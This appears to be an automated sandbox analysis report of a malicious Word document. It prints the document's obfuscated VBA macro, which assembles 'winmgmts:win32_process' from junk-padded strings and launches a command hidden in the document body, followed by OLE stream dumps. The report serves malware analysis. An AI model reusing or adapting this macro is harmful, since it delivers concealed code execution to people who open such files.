fDZVKAAc:
uWZkeMFv.WriteLine
xLQtMd
nleaHR
gEcrV:
"OyFBLhlWUnD"
uWZkeMFv.Close
xsruLB
zDsRaIBGF
mgrwfmN
"XZzpBRpDKuMgsGHIHF"
"VrVKCjefsIJ"
pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
SblcDCC:
SQQWY
"hbtzFRJEXyDCXI"
iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
sCOIGDtD:
gxBPJB
jbUmDI
DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
"BnxHFzJCGhVHrFIm"
IcAHwPH
iFTmFHFH
STzBjwICv
kwzjKvZHe
fDZVKAAc.WriteLine
plqkuDI
RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
ZMdrVHGz:
SeHafBC
nhLeJMLfI
EISYDDB
EhCMG
UDSpFHqFJ
WlBWDXGD
"NisSEYrcDlKQUITa"
"dXFPCSYtSNB"
"NeiIGCNWgICn"
OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
mgrwfmN.Close
YVZXECEHD
FLtYjKHC
GfRPP.Close
idbaDIr
"dnUnKFHAkIOdD"
"nJJzFRjEWpRikxCD"
ANzGyzCD
MmSDYCkJR
"hKlajOujwgDFAA"
"eeVVJBMGlcfXMB"
RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
iHKuDmaEr:
"CcDmClHsnCC"
"UjBKOEDRIbiWFB"
QOrvJEB
"sxbwAfRtWJI"
UskmBJF
"KqVyuQQfwTWh"
tpOgXmm
fiyQuiRBI
gphNDVZp
vEBqHrDnD
PbhYVsA.Close
ZMdrVHGz.Close
"vVbvIHcFGEAJJ"
CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
KmGOADt
Resume
phIwFD
jPJENIo
AiRdGDAJ
KmGOADt.Close
"]an"
PnolTIbAB
"eEWdaDQVJJqTHgF"
gxBPJB:
eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
FYVZFEH
tzErBRFe
"LvnHAGHfIhRDBRAF"
NuebA:
sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
oQgLUI
SblcDCC.Close
HCvCmAcHC
"eXpjHFapHaPdRJu"
eepvDEaE
"DBvMcNtCcMyJDDI"
MHYlQAD
"ekluIEBJFIgoBcGC"
dXiwA
"MiCjaGqJfPrI"
eCIzUDyJ
RyDBDK
hFSyAfFrF
"fDdPHEjBEnAdZqZFJ"
zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
"MxCpGaGqBgemCAFEJ"
PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
sCOIGDtD.Close
uWZkeMFv
gzTFLxb
IePCGy
swNGWdd
qHKYGHlFA
OIbfvEEFF
CHVmaVC
ZMdrVHGz
TXmxvp
quDoH
iHKuDmaEr.WriteLine
KXTliE
ddanFDWJf
rJEkbLH
fNhiCVgGS:
noebIvSiu
YZllAeRe
VB_Name
"eXObOTlBAITEOIo"
mgrwfmN:
LzxxRHG
inIcjJtaF
EKmLA
uVItICICB
mgrwfmN.WriteLine
KXwaABT
fDZVKAAc.Close
Mid(Application.Name,
fmwdEMADQ
lBenBDA
SblcDCC
mgTNFCq
NuebA.WriteLine
hXxQDACJA
KmGOADt.WriteLine
HCvCmAcHC.Close
yJmmmVIAG
rYbgBh:
iHKuDmaEr.Close
NuebA.Close
hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
ZMdrVHGz.WriteLine
OlapGi
zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
"CVbRCAAhkhmcDG"
HCvCmAcHC:
BNmrm
rYbgBh
"WNFUDvHgghFdup"
uRnkDGJ
"qiXBsMBsLJGbX"
yabVbA
zBSWCKmJv
bbsIZ
"zdTcdOoXXUFHJK"
xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
RqlOZAHRJ
fNhiCVgGS.WriteLine
hjZwD
"EgxfIDVQbJotWhj"
"BUUJYAAIoJvLBLAo"
PcHRGIADo
wTMSLyWFG
sCOIGDtD
PbhYVsA:
"BndJDkuVYF"
KmGOADt:
"RhnJRGeBNASBQHHGF"
anyPG
"JTSPCDjykfL"
sreXHFD
"XrrAwQZPjqB"
hoyzuBGCP
UavHTIBHo
qAUhkIMz
EKezHIC
PjNhJNA
GznGGHyG
UwyYSBsBN
ORLICIl
cwsTFPCH
"]anw["
drZcHkCm
hDJDJ
NXbmIuHX
Function
"syYTHJShrguhzb"
AioOpBFE
xiFRA
fmwdEMADQ.WriteLine
gxBPJB.Close
NZiApKAp
gEcrV.Close
"mehEFPFHcklgJDDx"
iHKuDmaEr
pULquU
SblcDCC.WriteLine
pkixJADG:
xkQqDXCcD
GIAKA
"TubioGUTLadgXbA"
"anBQXljzGenE"
xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
fDZVKAAc
ecGmY
"ptABFEZDmkMVIeD"
"TBKmUCEXTUIGu"
"fxSJajCGlWUEBW"
rYbgBh.WriteLine
DhnHIY
sCOIGDtD.WriteLine
tAmQHxlD
tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
"wypNISsWSXthFJCq"
eLmLDU
jENfzNH
gEcrV.WriteLine
Nothing
"uTtCAFwHpCGF"
PbhYVsA
gEcrV
NuebA
"aqGiHISIbAoabV"
fNhiCVgGS.Close
jsYAGBJAF
RhztCF
lADFBaJ
FUyIHBDFz
sPkIwu
ViWsSIH
gxBPJB.WriteLine
zZuzBZGD
pkixJADG.WriteLine
MznOjBB
fmwdEMADQ.Close
sTzDC
"oLweAMoGsqVE"
diCXTi
GfRPP.WriteLine
Error
uWZkeMFv:
xPBGH
Attribute
sySRJ
"WLXLJnjItPGPZJ"
"JMgUDAIEJlgyNBH"
jzqBlGW
CFdSBD
pkixJADG.Close
ibIiBF
"qDaYIDDSZQMTaO"
pkixJADG
GfRPP:
LQqlBAHD
dLRiF
"ImJJdfAtdFHCh"
PbhYVsA.WriteLine
DkLoDL
RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
fNhiCVgGS
fmwdEMADQ:
rYbgBh.Close
zxgLHJSFW
HCvCmAcHC.WriteLine
hZCth

VBA Code

Attribute VB_Name = "Owppnp8hah4xo788"
Function G8xesq0b8jlsfrsp()
On Error Resume Next
Dhubl2is48jort = "Jsnt2t9fi0a8nnsiaf" + "Bete9x47doew46v"
sf4 = Zw1k7hcmdl66 + A5gd21klfqu9c6rs.StoryRanges.Item(2 / 2) + Hyii7r76oq89
   GoTo SblcDCC
Dim pULquU As Object
Set ibIiBF = diCXTi
Set pULquU = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim SblcDCC As Object
Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
SblcDCC.WriteLine "VrVKCjefsIJ"
SblcDCC.WriteLine "sxbwAfRtWJI"
SblcDCC.WriteLine "WLXLJnjItPGPZJ"
Set jbUmDI = NZiApKAp
SblcDCC.Close
Set pULquU = Nothing
Set MznOjBB = vrYYHIDxI
Set SblcDCC = Nothing
SblcDCC:
t3s = "]anw[3" + "p]anw[3"
K50yjh8o6l7s = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
   GoTo fNhiCVgGS
Dim RyDBDK As Object
Set WTbkNqFa = gzTFLxb
Set RyDBDK = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fNhiCVgGS As Object
Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
fNhiCVgGS.WriteLine "ImJJdfAtdFHCh"
fNhiCVgGS.WriteLine "deVdMyoREdgzCaJb"
fNhiCVgGS.WriteLine "XZzpBRpDKuMgsGHIHF"
Set OlapGi = PjNhJNA
fNhiCVgGS.Close
Set RyDBDK = Nothing
Set yabVbA = oAaNlB
Set fNhiCVgGS = Nothing
fNhiCVgGS:
Brlo236t2rmfu = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"
   GoTo HCvCmAcHC
Dim iFTmFHFH As Object
Set UDSpFHqFJ = sySRJ
Set iFTmFHFH = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim HCvCmAcHC As Object
Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
HCvCmAcHC.WriteLine "uTtCAFwHpCGF"
HCvCmAcHC.WriteLine "lwWhZGEasjsS"
HCvCmAcHC.WriteLine "MiCjaGqJfPrI"
Set MmSDYCkJR = UwyYSBsBN
HCvCmAcHC.Close
Set iFTmFHFH = Nothing
Set EISYDDB = tpOgXmm
Set HCvCmAcHC = Nothing
HCvCmAcHC:
Iogna_9cq5gv = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"
   GoTo gEcrV
Dim RqlOZAHRJ As Object
Set jsYAGBJAF = MHYlQAD
Set RqlOZAHRJ = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim gEcrV As Object
Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
gEcrV.WriteLine "dXFPCSYtSNB"
gEcrV.WriteLine "KqVyuQQfwTWh"
gEcrV.WriteLine "qDaYIDDSZQMTaO"
Set IePCGy = GznGGHyG
gEcrV.Close
Set RqlOZAHRJ = Nothing
Set cwsTFPCH = bbsIZ
Set gEcrV = Nothing
gEcrV:
Fo4b_d8mj9usjgaha = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"
   GoTo ZMdrVHGz
Dim xsruLB As Object
Set fiyQuiRBI = swNGWdd
Set xsruLB = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim ZMdrVHGz As Object
Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
ZMdrVHGz.WriteLine "MxCpGaGqBgemCAFEJ"
ZMdrVHGz.WriteLine "hbtzFRJEXyDCXI"
ZMdrVHGz.WriteLine "zdTcdOoXXUFHJK"
Set xPBGH = rJEkbLH
ZMdrVHGz.Close
Set xsruLB = Nothing
Set dLRiF = vEBqHrDnD
Set ZMdrVHGz = Nothing
ZMdrVHGz:
K427k3xfk130n18n = Iogna_9cq5gv + Fo4b_d8mj9usjgaha + Brlo236t2rmfu + t3s + K50yjh8o6l7s
   GoTo fDZVKAAc
Dim tzErBRFe As Object
Set SeHafBC = tWcKo
Set tzErBRFe = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fDZVKAAc As Object
Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
fDZVKAAc.WriteLine "hKlajOujwgDFAA"
fDZVKAAc.WriteLine "JMgUDAIEJlgyNBH"
fDZVKAAc.WriteLine "BUUJYAAIoJvLBLAo"
Set CHVmaVC = LzxxRHG
fDZVKAAc.Close
Set tzErBRFe = Nothing
Set WlBWDXGD = EKezHIC
Set fDZVKAAc = Nothing
fDZVKAAc:
Lutf6_3d403q9 = Jlda77h_v8nx5(K427k3xfk130n18n)
   GoTo rYbgBh
Dim hZCth As Object
Set LQqlBAHD = DpYbmDA
Set hZCth = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim rYbgBh As Object
Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
rYbgBh.WriteLine "CVbRCAAhkhmcDG"
rYbgBh.WriteLine "XrrAwQZPjqB"
rYbgBh.WriteLine "fxSJajCGlWUEBW"
Set phIwFD = hDJDJ
rYbgBh.Close
Set hZCth = Nothing
Set PnolTIbAB = dXiwA
Set rYbgBh = Nothing
rYbgBh:
Set Mwzin4vxc1irit = CreateObject(Lutf6_3d403q9)
   GoTo GfRPP
Dim xLQtMd As Object
Set uRnkDGJ = hFSyAfFrF
Set xLQtMd = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim GfRPP As Object
Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
GfRPP.WriteLine "qiXBsMBsLJGbX"
GfRPP.WriteLine "mehEFPFHcklgJDDx"
GfRPP.WriteLine "BndJDkuVYF"
Set xiFRA = hXxQDACJA
GfRPP.Close
Set xLQtMd = Nothing
Set jENfzNH = xkQqDXCcD
Set GfRPP = Nothing
GfRPP:
Jaaqx1xn5daotw = Mid(sf4, (1 + 4), Len(sf4))
   GoTo sCOIGDtD
Dim eepvDEaE As Object
Set jzqBlGW = lBenBDA
Set eepvDEaE = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim sCOIGDtD As Object
Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
sCOIGDtD.WriteLine "JTSPCDjykfL"
sCOIGDtD.WriteLine "bBmgOCvPPojGGC"
sCOIGDtD.WriteLine "anBQXljzGenE"
Set tAmQHxlD = UavHTIBHo
sCOIGDtD.Close
Set eepvDEaE = Nothing
Set gphNDVZp = IcAHwPH
Set sCOIGDtD = Nothing
sCOIGDtD:
   GoTo fmwdEMADQ
Dim DkLoDL As Object
Set plqkuDI = BNmrm
Set DkLoDL = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fmwdEMADQ As Object
Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
fmwdEMADQ.WriteLine "dnUnKFHAkIOdD"
fmwdEMADQ.WriteLine "ekluIEBJFIgoBcGC"
fmwdEMADQ.WriteLine "BnxHFzJCGhVHrFIm"
Set jPJENIo = FLtYjKHC
fmwdEMADQ.Close
Set DkLoDL = Nothing
Set ANzGyzCD = qAUhkIMz
Set fmwdEMADQ = Nothing
fmwdEMADQ:
Mwzin4vxc1irit.Create Jlda77h_v8nx5(Jaaqx1xn5daotw), V2enhc4htwl7z6bh, Thriap3q9rgf3yy9y
   GoTo pkixJADG
Dim DhnHIY As Object
Set oQgLUI = zZuzBZGD
Set DhnHIY = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim pkixJADG As Object
Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
pkixJADG.WriteLine "fDdPHEjBEnAdZqZFJ"
pkixJADG.WriteLine "wypNISsWSXthFJCq"
pkixJADG.WriteLine "LvnHAGHfIhRDBRAF"
Set ecGmY = OIbfvEEFF
pkixJADG.Close
Set DhnHIY = Nothing
Set EKmLA = eLmLDU
Set pkixJADG = Nothing
pkixJADG:
   GoTo KmGOADt
Dim CFdSBD As Object
Set nhLeJMLfI = FYVZFEH
Set CFdSBD = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim KmGOADt As Object
Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
KmGOADt.WriteLine "DBvMcNtCcMyJDDI"
KmGOADt.WriteLine "eXpjHFapHaPdRJu"
KmGOADt.WriteLine "eXObOTlBAITEOIo"
Set STzBjwICv = hoyzuBGCP
KmGOADt.Close
Set CFdSBD = Nothing
Set ORLICIl = lADFBaJ
Set KmGOADt = Nothing
KmGOADt:
End Function
Function Jlda77h_v8nx5(Wwsqkhmtfcf3_y)
On Error Resume Next
   GoTo PbhYVsA
Dim PcHRGIADo As Object
Set TXmxvp = SQQWY
Set PcHRGIADo = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim PbhYVsA As Object
Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
PbhYVsA.WriteLine "eEWdaDQVJJqTHgF"
PbhYVsA.WriteLine "OyFBLhlWUnD"
PbhYVsA.WriteLine "TBKmUCEXTUIGu"
Set qHKYGHlFA = ddanFDWJf
PbhYVsA.Close
Set PcHRGIADo = Nothing
Set sPkIwu = RhztCF
Set PbhYVsA = Nothing
PbhYVsA:
Gqzsjl136wugk27i9 = Wwsqkhmtfcf3_y
   GoTo NuebA
Dim sTzDC As Object
Set GIAKA = kwzjKvZHe
Set sTzDC = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim NuebA As Object
Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
NuebA.WriteLine "NeiIGCNWgICn"
NuebA.WriteLine "EgxfIDVQbJotWhj"
NuebA.WriteLine "UjBKOEDRIbiWFB"
Set idbaDIr = inIcjJtaF
NuebA.Close
Set sTzDC = Nothing
Set KXwaABT = zBSWCKmJv
Set NuebA = Nothing
NuebA:
Gnc9qzz9241pnhfi = Hrs2a1p95u19(Gqzsjl136wugk27i9)
   GoTo gxBPJB
Dim zxgLHJSFW As Object
Set quDoH = KXTliE
Set zxgLHJSFW = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim gxBPJB As Object
Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
gxBPJB.WriteLine "RhnJRGeBNASBQHHGF"
gxBPJB.WriteLine "WNFUDvHgghFdup"
gxBPJB.WriteLine "eeVVJBMGlcfXMB"
Set nleaHR = YZllAeRe
gxBPJB.Close
Set zxgLHJSFW = Nothing
Set mgTNFCq = hjZwD
Set gxBPJB = Nothing
gxBPJB:
Jlda77h_v8nx5 = Gnc9qzz9241pnhfi
   GoTo mgrwfmN
Dim RjiQHRA As Object
Set EhCMG = FUyIHBDFz
Set RjiQHRA = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim mgrwfmN As Object
Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
mgrwfmN.WriteLine "ptABFEZDmkMVIeD"
mgrwfmN.WriteLine "vVbvIHcFGEAJJ"
mgrwfmN.WriteLine "NisSEYrcDlKQUITa"
Set MNihxICY = AiRdGDAJ
mgrwfmN.Close
Set RjiQHRA = Nothing
Set wTMSLyWFG = AioOpBFE
Set mgrwfmN = Nothing
mgrwfmN:
End Function
Function Hrs2a1p95u19(Svk60sycz63sk)
Q491417n8n1 = Pg5minli2d3c9
   GoTo uWZkeMFv
Dim zDsRaIBGF As Object
Set ViWsSIH = sreXHFD
Set zDsRaIBGF = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim uWZkeMFv As Object
Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
uWZkeMFv.WriteLine "CcDmClHsnCC"
uWZkeMFv.WriteLine "aqGiHISIbAoabV"
uWZkeMFv.WriteLine "nJJzFRjEWpRikxCD"
Set QOrvJEB = eCIzUDyJ
uWZkeMFv.Close
Set zDsRaIBGF = Nothing
Set UskmBJF = yJmmmVIAG
Set uWZkeMFv = Nothing
uWZkeMFv:
Hrs2a1p95u19 = Replace(Svk60sycz63sk, "]a" + "nw[3", Ij2hesgjee57d3s0)
   GoTo iHKuDmaEr
Dim OMZxxg As Object
Set drZcHkCm = uVItICICB
Set OMZxxg = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim iHKuDmaEr As Object
Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
iHKuDmaEr.WriteLine "syYTHJShrguhzb"
iHKuDmaEr.WriteLine "TubioGUTLadgXbA"
iHKuDmaEr.WriteLine "oLweAMoGsqVE"
Set noebIvSiu = anyPG
iHKuDmaEr.Close
Set OMZxxg = Nothing
Set NXbmIuHX = YVZXECEHD
Set iHKuDmaEr = Nothing
iHKuDmaEr:
End Function

VBA File Name: Zdjtk46nm17voo, Stream Size: 701

General
Stream Path:	Macros/VBA/Zdjtk46nm17voo
VBA File Name:	Zdjtk46nm17voo
Stream Size:	701
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 49 85 8d 23 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name

VBA Code
`Attribute VB_Name = "Zdjtk46nm17voo"`

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 146

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	146
Entropy:	4.00187355764
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.280929556603
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . # . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 536

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	536
Entropy:	4.08810399443
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 e8 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 70 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6412

General
Stream Path:	1Table
File Type:	data
Stream Size:	6412
Entropy:	6.14518057053
Base64 Encoded:	True
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 99192

General
Stream Path:	Data
File Type:	data
Stream Size:	99192
Entropy:	7.3901039161
Base64 Encoded:	True
Data ASCII:	x . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . . . . . . D . . . . . = . . F . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . .
Data Raw:	78 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00

